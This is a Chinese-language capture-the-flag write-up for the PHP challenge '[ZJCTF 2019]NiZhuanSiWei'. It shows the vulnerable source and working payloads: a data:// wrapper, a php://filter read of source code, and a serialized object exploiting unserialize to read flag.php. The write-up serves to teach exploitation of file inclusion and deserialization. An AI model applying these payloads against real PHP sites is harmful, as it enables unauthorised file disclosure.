[ZJCTF 2019]NiZhuanSiWei

<?php
    $text = $_GET["text"];
    $file = $_GET["file"];
    $password = $_GET["password"];
    if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
        echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
        if(preg_match("/flag/",$file)){
            echo "Not now!";
            exit();
        }else{
            include($file);  //useless.php
            $password = unserialize($password);
            echo $password;
        }
    }
    else{
        highlight_file(__FILE__);
    }

通过get请求方式传递三个参数 text file password
第一个if判断：要求text参数不为空 并且根据$text读去出来的字符串需要为welcome to the zjctf
第二个if判断：要求$file中不能包含关键字flag，这里是过滤掉flag，但是通过注释给出的提示，应该是要求包含useless.php
  满足不包含flag之后，包含$file文件，并且反序列化$password，最后输出$password（输出一个类，会调用toString()方法）

  第一先要满足$text读出来是welcome to the zjctf，考虑使用伪协议data://
  对字符串进行base64编码 d2VsY29tZSB0byB0aGUgempjdGY=
  使用data伪协议封装数据 data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
  payload text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
  第二是要满足$file中不含有flag，并且根据提示尝试包含文件useless.php
  这里还是要用的php伪协议，读取useless.php的源码
  使用filter伪协议读取源码 php://filter/read=convert.base64-encode/resource=useless.php
  payload file=php://filter/read=convert.base64-encode/resource=useless.php
  分析到useless.php的源码
  第三是反序列化后，输出$password，调用Flag类的toString()方法
  传入$file=flag.php，这样在toString()方法中输出的文件就是flag.php
  payload password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

  最终payload
  ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
 

<?php
class Flag
{  //flag.php
    public $file;

    public function __tostring()
    {
        if (isset($this->file)) {
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}

$a = new Flag();
$a ->file = 'flag.php';
echo serialize($a);

定义了一个Flag类
 首先是声明了一个$file
 然后是这个类的toString魔术方法，先判断$file是否为空，
 如果不为空就读取文件$file，输出并返回
 
 这里很明显的调用反序列化后，调用Flag类的toString方法，输出文件$file（也就是flag.php）
 进行序列化操作后生成的字符串 O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
 payload password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

总结，这个题呢主要就是考察了php伪协议的使用、php反序列化。
关键就在于能否将php伪协议熟练的运用，通过data伪协议封装数据，再结合file_get_contents()将数据读取出来，
php伪协议的功能很多既可以封装数据、输入数据也可以读取源码、读取文件，要将协议和函数结合起来灵活使用。